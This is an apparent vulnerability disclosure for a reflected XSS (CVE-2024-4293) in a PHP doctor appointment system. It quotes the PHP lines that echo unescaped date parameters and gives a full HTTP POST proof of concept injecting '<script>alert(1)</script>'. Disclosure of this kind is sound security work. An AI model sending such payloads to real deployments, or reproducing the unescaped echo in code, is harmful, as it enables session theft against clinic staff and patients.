# Application Name: Doctor Appointment Management System # Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/) # Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/) # BuG: XsS # BUG_Author: SoSPiro # Version: 1.0 # CVE: CVE-2024-4293 ### Vulnerable code section: - `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php` - **`Lines 57-61`** - Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']` ```php <?php $fdate=$_POST['fromdate']; $tdate=$_POST['todate']; ?> <h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5> ``` - The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks. ### Vulnerability Description: - The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users. ### Proof of Concept (PoC) - Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing) - Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing) ```http POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 60 Origin: http://localhost Connection: close Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-PwnFox-Color: blue fromdate=<script>alert(1)</script>&todate=2024-04-18&submit= ``` - In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field: `<script>alert(1)</script>` - Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited. ### Impact: - The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website. ### Reproduce: - [ -vuldb.com- ](https://vuldb.com/?id.262225) - [ -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293) - [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md) - [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)